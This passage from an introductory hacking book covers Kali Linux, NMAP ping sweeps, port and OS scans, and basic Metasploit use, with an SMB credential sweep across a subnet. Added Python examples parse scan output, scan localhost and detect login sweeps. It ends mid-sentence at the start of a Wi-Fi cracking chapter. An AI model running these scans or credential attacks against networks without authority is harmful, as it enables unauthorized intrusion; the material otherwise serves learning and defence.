programs. However, you should also know about Kali Linux. Kali was 
specifically designed with hacking in mind, and the security packages 
contained in the VMWare image are mostly geared towards providing 
users with tools that facilitate hacking. However, it is a little more 
challenging to use if you haven’t been exposed to Linux already, and 
much of its power is found at the command line. 


Each different VMWare image and Linux distribution has different 
default usernames and passwords. You can check the defaults on the 
website where you downloaded the code image, but they are most 
typically ‘root’ and ‘toor’ or ‘username’ and ‘password.’ If you wish, 
you can create additional user accounts but this isn’t necessary as we 
will only be using these operating systems to run some demos. 


Though I would personally recommend that you take full advantage of 
VMWare to virtualize Linux operating systems to provide you with 
hacking tools, you do have an alternative. Many Linux distributions 
can be downloaded and burned to a CD or DVD. These are called ‘live 
boot’ images because all you need to do is pop the disk in your 
computer, reboot it, and voila. Your computer will boot to the Linux 
operating system contained on the disc. Some versions of Linux are so 
small and lightweight that you can even boot from a flash drive. 
However, there is one caveat with these live boot images. Your 
computer may or may not be configured to boot from the hard drive 
before the disc drive or USB port. If this is the case for your computer, 
you would first need to change the boot order of these devices. It is a 
little difficult to explain this procedure since every make and model of 
computers and laptops have a slightly different process, but you can 
Google this procedure for your make and model of computing device 
to change the boot order to accommodate a live Linux CD or DVD. 
Personally, I prefer VMWare because you can switch between your 
host operating system (Windows in my case) and your virtual 
machines without needing to reboot your computer. 


Lastly, if you want to get your feet wet hacking, I highly advise you 
take the time to get your Linux environments set up. Most of the 
demos we will be running in this book will be from a Linux operating 
system. Note that while many of these tools have versions that work 
with Windows, Linux is still the preferred operating environment for 
hackers: most of these tools are written for Linux first, their source 
code is available, and the raw network access that scanners and 
sniffers need is simpler to get than on Windows. 


Chapter 8 — Introduction to Ping Sweeps, Port 
Scanning, and NMAP 


It’s finally time to dig into the good stuff! In this chapter I will walk 
you through how to perform network scanning and reconnaissance 
techniques using a program called NMAP. This is the program that the 
hackers in the movies like to flaunt, and it is fairly easy to use. The 
whole point of NMAP is to feel out a network and scan it to discover 
active devices, open ports, and other vital information such as which 
operating system the host is running. In the network penetration and 
hacking world, this is referred to as network mapping, footprinting, or 
reconnaissance. 


Without these tools, you are essentially blind on any given network 
and you would have a hard time attacking anything since you 
wouldn’t be able to see any targets. Also, think just how important it 
is to know what operating system a host is using. Exploits come and 
go, and new ones are constantly surfacing as new operating systems 
are developed or patches are applied. For example, with each new 
version of Windows, there are countless security vulnerabilities that 
are slowly identified and patched over time. By knowing the operating 
system version on a host, you could use a tool such as Metasploit to 
search for active vulnerabilities and exploit them. 


Once an attacker has gained access to a network, there are a lot of 
things they can do to prepare an attack. The following are some of the 
more common footprinting goals: 


-Gather general information about the network 
-Find the local subnet’s IP address structure 
-Search for networking devices such as a router, switch, or firewall 
-Identify active hosts on the network such as end user workstations 
-Discover open ports and access points 
-Find out detailed information regarding the operating systems on 
active machines 
-Discover the type of device such as a laptop, tablet, smartphone, or 
server 
-Map the local network 
-Capture network traffic 


Even if you don’t have an advanced degree in computing, Linux 
software and network penetration programs are becoming so 
sophisticated that it is unbelievably simple to carry out these 
footprinting tasks. The only things you need are a Linux system (see 
chapter 6), the right software, a rudimentary understanding of 
networking concepts (see chapter 5), and a guide. The rest of this 
chapter will focus on using NMAP to feel out and map a network. 
Contrary to the old adage, remember to try this at home! Don’t use the 
knowledge in this chapter to start poking around the network at your 
office or in a public setting. Respect others’ privacy or there may be 
harsh consequences. 


Ping Sweeps 


The first and easiest technique you need to understand is called a ping 
sweep. A ping sweep is a useful way to identify active machines on a 
given subnet. If you aren’t familiar with a ping operation, let’s take a 
moment to explain this concept. Ping is a utility that uses ICMP 
(Internet Control Message Protocol), and it is frequently used to 
determine if two hosts have an end-to-end connection. The host that 
initiates the ping sends a small packet called an ICMP echo request. If 
the target host is online, reachable, and willing to answer, it sends 
back an ICMP echo reply. This shows you that the host is online and 
that it isn’t suffering from connection problems over the network 
between the two hosts. 


If you really wanted to, you could manually go through each IP 
address on your network and ping it from your computer to see what 
IP addresses other hosts on the network are using. In reality though, 
this simply isn’t feasible. It would be very tedious and time consuming 
trying to ping hundreds of individual IP addresses to see if any hosts 
are online. This is why ping sweeps are so useful — they allow you to 
ping every valid IP address on a subnet automatically. After the sweep 
has been completed, NMAP will return a list of all the addresses that 
replied to the ping and allow you to see the IP addresses of other 
active hosts on the scanned network. 


However, there are a couple of caveats to ping sweeps. They don’t 
always show you every single host attached to a network. There are a 
few reasons why a host might not respond to a ping sweep. Firstly, the 
host’s network card could be faulty or broken in some way. Secondly, 
there could be problems on the network between your host and the 
target subnet that prevent the ping from completing successfully. 
Lastly (and most importantly), network admins configure hosts not to 
respond to pings precisely so that a ping sweep won’t identify them, 
and host firewalls (the Windows firewall included) often drop 
incoming echo requests by default. In some instances, your ping might 
also pass through a network firewall that doesn’t allow ICMP traffic. 


On a home network these are the exceptions, though, and not the rule, 
and the vast majority of active hosts will show up in a ping sweep. 
This is especially true if you are performing a ping sweep on the 
subnet that your computer is directly connected to: there NMAP 
discovers hosts with ARP requests rather than ICMP, and a host cannot 
ignore ARP and still use the network, so even hosts that block ping are 
found. 


Operating System Identification 


Yet another useful feature of the NMAP utility is the ability to identify 
the operating systems that active hosts are using. Though you may not 
think so at first, this is actually some critical information. After you 
know what operating system and version a host is using, you can 
then search databases using tools such as Metasploit to identify 
weaknesses and vulnerabilities. Furthermore, NMAP can often tell you 
the type and vendor of the device. This is also critical because it helps 
you discern what kinds of devices are present such as host computers, 
tablets, phones, infrastructure devices, hardware appliances, printers, 
routers, switches, and even firewalls. 


Port Scanning 


Port scanning is a little different from a ping sweep. With port 
scanning, the goal is to find what port(s) are open on a whole subnet 
or a single host. For example, you could perform a port scan on your 
local subnet to see if any hosts are accepting connections on port 80 
(HTTP). This is a great way to see if you can access any networking 
devices such as a wireless router, printer, or a firewall. Because these 
types of devices typically have web configuration interfaces, any hosts 
that are accepting connections on port 80 (HTTP) will show you a 
login prompt if you type their IP address into a web browser. For 
example, if your port scan revealed that the host 192.168.1.1 (this is 
most likely the default address of your wireless router) is accepting 
connections on port 80, you could reach its login interface by typing 
http://192.168.1.1 in your web browser. This will initiate a 
connection on port 80 for the host 192.168.1.1 (see chapter 5 for 
networking fundamentals, IP addresses, and ports). 


It is likely that the administrator changed the default username and 
password for that device, but you would be surprised how frequently 
people fail to do this because they are inexperienced, lazy, or just 
plain ignorant of the massive security risk they encounter by leaving 
the username and password set to default values. If you wanted to, 
you could even use NMAP to find what type of firmware the 
networking device is running as well as the model number. Then all 
you need to do is perform a quick Google search to find the default 
values and attempt to login to the device. But this is just one simple 
example of port scanning. You could even scan a single host to see all 
of the ports that are accepting connections. And port scanning goes 
well outside the realm of scanning port 80 to see if you can pull up a 
web interface. An open port means a service is listening there, and a 
vulnerable service is what an exploit targets: crafted input sent to that 
port can take advantage of a flaw in the protocol or the program 
behind it to gain a foothold, escalate an attacker’s privileges, or deny 
the target the use of that network service. 


NMAP Footprinting Procedures: Installing NMAP 


Before we begin, there is one last thing we need to do to configure 
VMWare connectivity. VMWare uses the idea of virtualized network 
adapters, and the default setting won’t put your virtual machine in the 
same subnet as your host operating system. Simply click on the 
‘settings’ tab of the VMWare application and find the configuration 
option for your ‘network interface.’ Now select the option to put it in 
bridged mode. 


To verify that your host operating system and VMWare operating 
system are on the same subnet, just run the ipconfig command from 
the Windows command line or the ifconfig command on Linux and 
Mac systems (on newer Linux distributions ifconfig may not be 
installed; ip addr shows the same information). Then check that the 
two addresses belong to the same subnet. 


To begin these demonstrations, you are going to want to fire up 
VMWare and boot your virtual Linux system. NMAP should already be 
installed if you selected the security packages as recommended earlier, 
but if you failed to do this there is good news. It is pretty darn simple 
to install NMAP. 


Open the terminal in your Linux distribution (either Kali or Ubuntu). 
Try running the following command to see if NMAP was installed 
successfully. 


- sudo nmap -sP 192.168.1.0/24 


Don’t worry about what this command does, we’ll dig into that 
information shortly (one note: -sP is the old name for this ping-scan 
option; current NMAP calls it -sn and still accepts -sP). If NMAP isn’t 
installed, the shell will tell you the command was not found. Don’t 
worry, this isn’t a big problem. We just need to run the following 
command to download and install NMAP: 


- sudo apt-get install nmap 


It will take only a short while to download and install, and you should 
receive confirmation from the terminal that the operation completed 
successfully. Now we can take a closer look at ping sweeps. 


NMAP Footprinting Procedures: Ping Sweeps 


Now that you have a good idea of what ping sweeps do, it’s time for a 
demonstration! Though you can download it for Windows, I would 
personally recommend you heed my advice and try your hand at 
installing VMWare to get used to a Linux environment. The following 
is the quick and easy 4 step process you need to run a ping sweep in 
Linux using NMAP. Again, remember that this tool is used to identify 
active hosts on a network. 


Step 1 - Run VMWare and boot to your Linux operating system. 


Step 2 - Open the terminal (a.k.a. the shell). This can be found by 
performing a search for ‘terminal’ after clicking the start button. If you 
failed to install the GUI (Graphical User Interface) during your 
installation, you would have booted to a black screen with a blinking 
cursor. This is the same as the terminal, so either will work for our 
purposes since we are working from the command line like those 
mythical hackers in the movies. However, if you feel uncomfortable in 
this environment and you want a GUI screen, just run the startx 
command. 


Step 3 - Run the following command: 


- sudo nmap -sP 192.168.1.0/24 


In this command, 192.168.1.0/24 is an example subnet. It is entirely 
possible that your computer is on a different subnet. To discover 
which subnet you are using, run the ipconfig command in Windows 
or ifconfig (or ip addr) on Linux and Mac systems. These commands 
will show you what IP address and subnet mask your computer is 
using. For example, if your IP address is 192.168.113.201 and your 
subnet mask is 255.255.255.0 (the same as /24), the command would 
be changed as follows: 


- sudo nmap -sP 192.168.113.0/24 


Now NMAP will work its magic and automatically perform a ping 
sweep across all valid IP addresses on the subnet you specified, 
which is 192.168.113.0/24 in this example. 


Step 4 — Read the results. After the operation completes, NMAP will 
return a list of IP addresses that successfully responded to the ping 
sweep. Be warned, though. Depending on the size of the subnet and 
your local computing resources, it could take a little while for the 
operation to complete. Just be patient and let NMAP do its thing. Now 
you have a little bit of ammunition to further your reconnaissance 
efforts. You can use the IP addresses found with the ping sweep as a 
parameter in the following commands to identify that host’s open 
ports and what operating system it is using. 
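Reading the sweep results by eye works for a home subnet, but you will want them in a form you can feed to the next commands. The script below is an added example written for this chapter (it is not part of NMAP and not the book’s own code): it parses NMAP’s grepable output format, which `-oG -` writes to standard output, and returns the live hosts in numeric order. The SAMPLE text inside it is constructed to look like that output (the addresses and hostnames are made up). It also understands the Ports field that the port-scanning command in the next section produces, so the same parser serves both procedures.

```python
"""Parse Nmap grepable (-oG) output into a list of live hosts and open ports.

Added example for this chapter, not code from Nmap or from the book.
Nmap can write results one line per host in its "grepable" format, and
-oG - sends that format to stdout, so a sweep can be piped straight in:

    sudo nmap -sn -oG - 192.168.113.0/24 | python3 parse_sweep.py

SAMPLE below is constructed to look like that output (addresses, names
and port states are made up). It includes one Ports line of the kind a
port scan (nmap -p 80 -oG - ...) produces, so the Ports field is handled too.
"""
import ipaddress
import re
import sys

SAMPLE = """\
# Nmap 7.94 scan initiated Wed May  1 10:00:00 2024 as: nmap -sn -oG - 192.168.113.0/24
Host: 192.168.113.1 (gateway.lan)\tStatus: Up
Host: 192.168.113.21 ()\tStatus: Up
Host: 192.168.113.5 ()\tStatus: Down
Host: 192.168.113.21 ()\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (998)
# Nmap done at Wed May  1 10:00:09 2024 -- 256 IP addresses (2 hosts up) scanned in 9.12 seconds
"""

# "Host: <ip> (<hostname>)" followed by tab-separated "Key: value" fields.
HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\t(?P<rest>.*)$")


def parse_grepable(text):
    """Return {ip: {"name": str, "up": bool, "ports": {(port, proto): (state, service)}}}.

    Several lines for the same IP (a Status line and a Ports line) are merged.
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines and anything unexpected
        entry = hosts.setdefault(m.group("ip"),
                                 {"name": m.group("name"), "up": False, "ports": {}})
        for field in m.group("rest").split("\t"):
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip() == "Up"
            elif key == "Ports":
                # Each entry is port/state/protocol/owner/service/rpcinfo/version/
                for spec in value.split(","):
                    parts = spec.strip().split("/")
                    entry["ports"][(int(parts[0]), parts[2])] = (parts[1], parts[4])
                entry["up"] = True  # Nmap only lists ports for hosts that answered
    return hosts


def live_hosts(hosts):
    """IPs that answered the sweep, sorted numerically rather than as strings."""
    return sorted((ip for ip, h in hosts.items() if h["up"]), key=ipaddress.ip_address)


def open_ports(hosts):
    """(ip, port, service) for every port reported open."""
    return sorted((ip, port, svc)
                  for ip, h in hosts.items()
                  for (port, _proto), (state, svc) in h["ports"].items()
                  if state == "open")


if __name__ == "__main__":
    # Read a real scan from a pipe; fall back to the constructed sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    parsed = parse_grepable(data)
    for ip in live_hosts(parsed):
        print(f"{ip:<16} {parsed[ip]['name'] or '-'}")
    for ip, port, svc in open_ports(parsed):
        print(f"{ip}:{port} open ({svc})")
```

Grepable output does not carry MAC addresses or OS guesses; for those use NMAP’s XML output (`-oX`) instead. The list this prints is exactly the set of targets you would hand to the port-scan and OS-detection commands that follow.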


NMAP Footprinting Procedures: Port Scanning 


Now it’s time to learn how to identify which ports are open on a 
target network or device. Just think how useful this is for ethical 
white hat penetration testers. This tool will essentially let them verify 
that hosts aren’t accepting connections on dangerous ports that should 
be blocked by a firewall, but realize this tool is a double-edged sword. 
Black hat hackers can use this tool to find open ports in an effort to 
find a way to break the system. Because you should have already run 
a ping sweep, I won’t list the steps in this demo. Just test out the 
command from the terminal that you already have open. The syntax 
of this command is as follows: 


- sudo nmap -p [PORT] [TARGET] 


In the command syntax, [PORT] is a numeric value representing the 
port you want to scan. If you wanted to scan for hosts accepting HTTP 
connections, you would set this value to ’80.’ The [TARGET] field 
specifies which host or subnet you want to scan. If you wanted to scan 
a single host, you would give just its address. If you wanted to scan 
your entire subnet, you would add the prefix length (the /24). Consider 
the following two examples: 


1. sudo nmap -p 80 192.168.113.21 (this scans the host with the 
address 192.168.113.21) 


2. sudo nmap -p 80 192.168.113.0/24 (this scans the entire 
192.168.113.0/24 subnet) 


Interestingly enough, this command won’t only show you if the 
desired port is open or closed. For hosts on your own subnet (and 
when run with sudo, so that NMAP can read the ARP replies) it will 
also display the host’s MAC address and the vendor looked up from 
the OUI (Organizationally Unique Identifier) portion of that MAC 
address. If you find that port 80 is open, go ahead and try to pull up 
the web configuration interface in a web browser just for kicks. Also, 
take the time to verify that your hosts that have port 80 open aren’t 
using the default username and password values. Remember, you 
should be doing this on your own home network instead of a network 
where you don’t have the authority to be running port scans! 
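To see what the `-p` scan above actually does for each port, here is a connect scan written out in Python. It is an added example for this chapter, not NMAP’s code and not the book’s: NMAP run as root defaults to a half-open SYN scan, whereas the connect scan here (what NMAP does with `-sT`, or without root) completes the full TCP handshake, so the target service sees a real connection and may log it. The demo only touches 127.0.0.1, against a throwaway listener it opens itself, so it runs offline; the port numbers it reports are whatever the kernel hands out.

```python
"""A TCP connect scan, to show what `nmap -p PORT TARGET` is doing per port.

Added example for this chapter; not Nmap's code and not from the book.
Nmap as root defaults to a SYN scan; the connect scan here (nmap -sT, or
Nmap without root) completes the three-way handshake, so the target's
service sees a real connection. The demo scans only 127.0.0.1 against a
listener it opens itself, so it works offline.
"""
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Classify one port the way a connect scan does.

    open     - the handshake completed, something is listening
    closed   - the host answered with a RST (connection refused)
    filtered - nothing came back before the timeout, usually a firewall
               silently dropping the SYN (other socket errors are lumped in)
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, TimeoutError, OSError):
            return "filtered"


def scan(host, ports, timeout=1.0, workers=32):
    """Return {port: state}. Probes run in parallel, which is why a scanner
    can cover thousands of ports in seconds despite a 1 s timeout each."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = pool.map(lambda p: probe(host, p, timeout), ports)
        return dict(zip(ports, states))


def free_port():
    """A loopback port that is currently not listening (bound, then released)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))  # port 0 = let the kernel pick a free one
        return s.getsockname()[1]


def demo():
    """Open a listener on a kernel-chosen port, scan it and its neighbours,
    and return (listening_port, results)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    port = srv.getsockname()[1]
    try:
        results = scan("127.0.0.1", range(port - 2, port + 3))
    finally:
        srv.close()
    return port, results


if __name__ == "__main__":
    listening, results = demo()
    for p, state in sorted(results.items()):
        tag = "   <- our listener" if p == listening else ""
        print(f"{p:>5}/tcp {state}{tag}")
```

The three states map directly onto what NMAP prints: `open` is a completed handshake, `closed` is an immediate RST, and `filtered` is silence, which is what a firewall that drops rather than rejects produces. That last case is also why a scan of a firewalled host can take far longer than a scan of an unprotected one: every filtered port costs a full timeout.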


NMAP Footprinting Procedures: Operating System 
Identification 


Last but not least, we’re going to learn how to use NMAP to identify a 
host’s operating system. The syntax for the command is extremely 
simple and follows a similar structure compared to the previous 
examples. The only difference is that you use the ‘-O’ option in the 
command. Consider the following example where we scan a target 
host to uncover what operating system is running on the target: 


- sudo nmap -O 192.168.113.21 


This example only scans the 192.168.113.21 host, but you could scan 
an entire subnet as we did in the preceding examples. NMAP 
fingerprints the way the target’s TCP/IP stack responds to a series of 
probes and reports its best guess at the operating system family and 
version range, along with how confident it is. It works best when the 
host has at least one open and one closed TCP port to probe, and like 
the other scans here it needs sudo because it sends raw packets. It 
does not tell you which patches have been applied; for that you need 
a service version scan or an authenticated check. 


In Summary 


Using NMAP, you can easily map a local network topology, identify 
active hosts with a ping sweep, scan for open ports, and identify 
operating systems. Note how short and sweet these commands are. 
These commands provide a high amount of leverage for an attacker 
because they are so simple to use and NMAP will do all of the dirty 
work for you. 


The next time you see a hacker in a movie, take a glance at their 
computer screen. More often than not, they are going to be using 
NMAP. Now you can actually decipher the cryptic text on their 
monitor! 


Chapter 9 — Using Metasploit to Hack Devices 


Now that we have taken a look at how to use command line tools via 
the terminal in Linux, things are going to heat up a little. While NMAP 
is a fantastic tool to map a local network and gather information 
about hosts, Metasploit is a tool that is designed to help you actually 
break into a system and exploit vulnerabilities. If you installed the full 
version of Kali Linux in the VMWare chapter and included the right 
security packages, you should already have Metasploit installed. In 
fact, it is included in many different Linux operating systems. Note 
that there is a version for Windows, but it is natively a Linux program 
and running it on Linux is preferred. Please understand that 
Metasploit is an extremely advanced tool, and there have been entire 
books and manuals written about it. I couldn’t possibly hope to 
elaborate on every exploit found within Metasploit, and the fact is 
that they are constantly updating the vulnerabilities, payloads, and 
exploits that can be taken advantage of. But I do want to show you 
some basic commands, how to navigate through the Metasploit 
prompt, and show you a basic demonstration of how Metasploit can 
be used to hack a computer. 


Also, note that I intentionally showed you how to use NMAP before 
Metasploit. As it turns out, you can actually run NMAP commands 
from the Metasploit prompt — but it goes a little deeper. You can even 
save the data collected from your scans in a Metasploit database to be 
used as input for other Metasploit commands. 


But just what exactly is Metasploit? Metasploit is an exploitation 
framework that is huge in the hacking and network penetration world, 
and I definitely recommend using this tool. Newbies have a hard time 
wrapping their heads around the fact that Metasploit is a framework 
and not a single stand-alone application. A lot of hackers use the code 
found in this handy tool to build and develop their own custom- 
tailored attacks. For example, if you were a hacker investigating and 
studying the vulnerabilities and exploits on the latest version of 
Windows, you would use Metasploit to find and take advantage of 
security flaws. 


Note that there are a few different versions of Metasploit and some are 
free while others cost money. Though you should run it in a Linux 
environment, there is a Windows version for those of you who are too 
scared of the Linux shell. For all practical purposes, you are only 
going to want to use the free version since the paid version costs 
$5,000 per user per year. 


Also know that because of the nature of the Metasploit program, you 
are going to need to turn off your software firewall or allow an 
exception, and antivirus software on Windows will flag the program. 
That detection is not a mistake in the usual sense: Metasploit ships 
real exploit and payload code, which is exactly what antivirus 
signatures look for, even though the software comes from a credible 
and reputable organization (Rapid7). Also, just like in the NMAP 
chapter, you are going to want to make sure that the VMWare network 
interface is configured for bridged mode. 


Lastly, you are going to need to be familiar with some terminology 
used in Metasploit such as payloads, exploits, listening, Metasploit 
interfaces, and have a general understanding of the database concept 
before moving forward. Payloads refer to sections of executable code 
that can be delivered to a target. After the payload has been 
successfully sent to its intended target, you can then run commands to 
further take advantage of that computer. Exploitation, on the other 
hand, simply means taking advantage of a known system vulnerability 
by using Metasploit. Listening means that Metasploit is running a 
handler that waits for a payload on the target to connect back to your 
machine (a reverse shell, for example) so that a session can be opened; 
a listener is not a packet sniffer like Wireshark. Furthermore, 
Metasploit interfaces include the MSFconsole as well as Armitage, but 
an interface could also refer to one of several network interfaces on 
your computer such as the wireless interface or the Ethernet port. 


To round out our discussion of basic Metasploit concepts, you need to 
be aware of the Metasploit database. The database is one of the 
features of this software that makes it so powerful, and you can save 
vast amounts of data you collect about different networks within the 
database. Not only will it help you organize the information you 
collect, but you can actually run commands on entries found in the 
database to ease the automation process. That way you don’t have to 
run the same command on every host you discovered using a tool such 
as NMAP. 


Basic Metasploit Commands 


To begin the hacking demonstration, you need to be familiar with 
several basic Metasploit commands and know what they do. First of 
all, you need to know how to reach the Metasploit prompt. To begin, 
open the terminal (or the shell — they’re the same thing) and type the 
following: 


msfconsole 


If you have properly installed the Metasploit framework, you should 
reach a prompt that displays ‘msf’ followed by a greater-than sign. 
From this prompt, there are a variety of basic commands you can use 
to get help, show additional commands, set targets for attacks, set 
ports for exploits, and many other useful tools and features. The 
following is a list of the basic Metasploit commands and their 
functions: 


-show options - lists the options of the module you have selected and 
which of them are required 

-set rhost 192.168.1.3 - sets the remote host (target) of an attack to 
192.168.1.3 (scanner modules use rhosts instead and accept a whole 
subnet) 

-set lhost 192.168.1.2 - sets the attacking local host to 192.168.1.2, 
the address a payload connects back to 

-set rport 80 - sets the port number of the target host to 80 

-set lport 53 - sets the local port the attacker listens on to 53 

-set payload [PAYLOAD] - selects the payload the exploit will deliver 

-unset rhost - removes a remote host’s IP address 

-unset lhost - removes a local attacking host’s IP address 

-use [MODULE] - selects an exploit, auxiliary, or other module to work 
with 

-exploit (or run) - launches the module you selected and configured 

-back - leaves the current module and returns to the main prompt 

-sessions -l - displays active sessions 

-sessions -i [ID] - interacts with an active session, where [ID] is a 
numeric value taken from the previous command 


To gain a better understanding of how Metasploit can be used to 
uncover weaknesses, let’s take a look at an auxiliary module that tests 
logins over SMB (Server Message Block, the Windows file sharing 
protocol). While these types of scanners and exploit techniques are fun 
in a personal setting and very beneficial for learning how to use 
Metasploit, this technique in particular is a very “noisy” scan. That is 
to say that it leaves a trail of failed logon attempts on every host it 
touches, which would draw the attention of a security professional if 
you performed it in an environment where you have no business 
scanning for weaknesses. 


Start from the MSF console and run the following command to select 
the module and enter its prompt: 


- use auxiliary/scanner/smb/smb_login 


From here you can view all of the parameters and options to configure 
before running the scan with the following command: 


- show options 


You'll notice a lot of fields that can be set to various values to fine- 
tune the scan. Most importantly, note the column labeled “Required.” 
The fields marked yes there need to have a value in them or you won’t 
be able to run the scan. To change the value in one of these fields, 
simply use the set command. For example, if I wanted to change the 
target in the rhosts (Remote Hosts) field, I would run the following 
command: 


- set rhosts 192.168.1.0/24 


This command will set the target to the entire subnet. For the SMB 
login check, you would also set SMBUser (the username) and SMBPass 
(the password) to try; the module takes one credential pair this way, 
or lists of them through its USER_FILE and PASS_FILE options. After 
all of the required fields have values and you have selected your 
target, username, and password, you can then run the scan with the 
following command: 


- run 


After you execute this command, you will see output of Metasploit 
trying the username and password against every host in the rhosts 
value, reporting each attempt as a failed or successful login. If you set 
it to your entire local network, it will run through each individual IP 
address on the subnet and attempt to log in. Note what this module 
does and doesn’t do: it doesn’t exploit a software flaw, it tests whether 
the credentials you gave it work, so the weakness it finds is a weak or 
default password. 


You might also have noticed that one of the fields is labeled 
BRUTEFORCE SPEED, which will tweak how fast the software will run 
through a brute force password attack on the targeted hosts. 


This is just one example of a Metasploit module, but there are many, 
many more. There are an unfathomably high number of exploits for 
the latest releases of operating systems and network protocols, and 
users who excel at using Metasploit can do some real damage. This 
example is just the tip of the iceberg, and some of the attacks and 
exploits are much more complex than our simple demonstration. Some 
of them do require more background knowledge to understand the 
attack, but by and large even newbies can run many of these attacks 
with little to no knowledge of the protocol’s or exploit’s internal 
mechanics. 
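Since the smb_login scan above is described as noisy, it is worth seeing what it looks like from the other side of the wire. The script below is an added example for this chapter, not Metasploit code and not the book’s own: it runs a simple detection rule over constructed logon records (one line per attempt with time, client, target server, account, and outcome, standing in for what a file server or a central log collector would record; Windows event 4625 and Samba’s log.smbd carry the same fields under other names). The rule flags a client that racks up many failures across hosts in a short window, and separately flags a success right after such a burst, because that success means a host on the subnet accepted the tried credentials. The thresholds, field names and sample lines are all assumptions made for the example.

```python
"""Spotting an smb_login style credential sweep in authentication logs.

Added example; not Metasploit code and not from the book. LOG is a
constructed, simplified record of logon attempts collected centrally:
one line per attempt (time, client, target server, account, outcome).
Real sources (Windows event 4625, Samba's log.smbd) carry the same
fields under other names; the rule below is the same either way.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG = """\
2024-05-01T10:00:01 src=192.168.1.2 dst=192.168.1.10 user=administrator result=FAIL
2024-05-01T10:00:01 src=192.168.1.2 dst=192.168.1.11 user=administrator result=FAIL
2024-05-01T10:00:02 src=192.168.1.2 dst=192.168.1.12 user=administrator result=FAIL
2024-05-01T10:00:02 src=192.168.1.2 dst=192.168.1.13 user=administrator result=FAIL
2024-05-01T10:00:03 src=192.168.1.2 dst=192.168.1.14 user=administrator result=FAIL
2024-05-01T10:00:03 src=192.168.1.2 dst=192.168.1.15 user=administrator result=FAIL
2024-05-01T10:00:04 src=192.168.1.2 dst=192.168.1.16 user=administrator result=FAIL
2024-05-01T10:00:05 src=192.168.1.2 dst=192.168.1.17 user=administrator result=OK
2024-05-01T10:03:00 src=192.168.1.40 dst=192.168.1.10 user=alice result=FAIL
2024-05-01T10:03:20 src=192.168.1.40 dst=192.168.1.10 user=alice result=OK
"""

THRESHOLD = 5                   # failures from one client ...
WINDOW = timedelta(seconds=60)  # ... inside this much time trips the alert


def parse_line(line):
    """'<iso timestamp> key=value key=value ...' -> dict with a datetime 'ts'."""
    ts, *pairs = line.split()
    event = dict(p.split("=", 1) for p in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    return event


def detect(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return {src: {"failures": n, "targets": set, "success_after_burst": bool}}
    for every client whose failures crossed the threshold inside the window.

    Correlating by client across all targets is the point: a single-credential
    sweep of a subnet produces only one failure per server, so a per-server
    lockout rule never fires on it.
    """
    recent = defaultdict(deque)  # src -> (ts, dst) of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        src, ts = ev["src"], ev["ts"]
        window_q = recent[src]
        while window_q and ts - window_q[0][0] > window:  # slide the window
            window_q.popleft()
        if ev["result"] == "FAIL":
            window_q.append((ts, ev["dst"]))
            if len(window_q) >= threshold:
                alert = alerts.setdefault(src, {"failures": 0, "targets": set(),
                                                "success_after_burst": False})
                alert["failures"] = len(window_q)
                alert["targets"] = {dst for _, dst in window_q}
        elif src in alerts:  # a success from a client already flagged
            alerts[src]["success_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for src, a in detect(LOG).items():
        print(f"{src}: {a['failures']} failures against {len(a['targets'])} hosts"
              + (", then a SUCCESSFUL logon" if a["success_after_burst"] else ""))
```

The ordinary user in the sample (one typo, then a correct password) never trips the rule; the scanning client does within four seconds, and the success that follows is the line a responder would act on first. BRUTEFORCE_SPEED, mentioned next, only changes how quickly those lines are written, not whether they appear.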


Chapter 10 — Wireless Password Hacking 


If you didn’t know already, there are methods of cracking wireless 
passwords so you can gain access to wireless networks when you don’t 
have the security key. Again, please only try this on your home 
networking equipment. Though it may be tempting to try to use this 
method to hack into your neighbor’s wireless network to get free Wi- 
Fi, this is a huge breach of privacy and it is not legal to do so. In 
addition, it is actually a pretty simple process to break weak Wi-Fi 
encryption and login to a wireless network. However, there are a 
couple caveats. 


You see, there are several different types of Wi-Fi encryption. WEP 
(Wired Equivalent Privacy) is broken outright: its key can be 
recovered from captured traffic in minutes. WPA (Wi-Fi Protected 
Access) and WPA2 are far stronger, but a network protected by a weak 
passphrase, or one with WPS (Wi-Fi Protected Setup) switched on, can 
still be cracked, and the latter is what the Reaver demonstration later 
in this chapter relies on. Though some wireless routers implement 
stronger Wi-Fi security standards that are more difficult to break into, 
your average home user doesn’t know the difference and typically 
doesn’t select the right protocol based on their knowledge of security. 


But why would you want to hack into a wireless network in the first 
place? After all, an expert hacker probably has bigger fish to fry than 
his neighbor who is using the Internet to look up the latest sports 
stats, right? Sure, that’s true enough, but imagine the havoc an 
experienced hacker could wreak upon a business network that uses 
weak security. While it’s true that most businesses — even small 
businesses — use IT staff that are well adept at implementing the 
strongest Wi-Fi security available to date, there are a few scenarios 
that happen all too often in a corporate setting. For example, consider 
a commercial establishment that provides both a company-wide Wi-Fi 
signal as well as a hard-wired Ethernet port for each of their 
employee’s offices. 


Sometimes employees don’t like to follow the rules and adhere to their 
company’s security policies. Many companies forbid plugging in a 


networking device to an Ethernet port, but often times network 
personnel will make a mistake in configuring the network - giving an 
employee the opportunity to connect a wireless router to their 
Ethernet port. Usually employees want to have their own wireless 
signal because they think it will give them faster Internet speeds. 


Whether or not it will actually increase their speed, this scenario 
happens all the time. And the problem is that it leaves a gaping 
security hole for hackers to take advantage of them. Because non- 
technical users don’t understand the details of Wi-Fi security 
standards, they may accidentally configure their wireless router for 
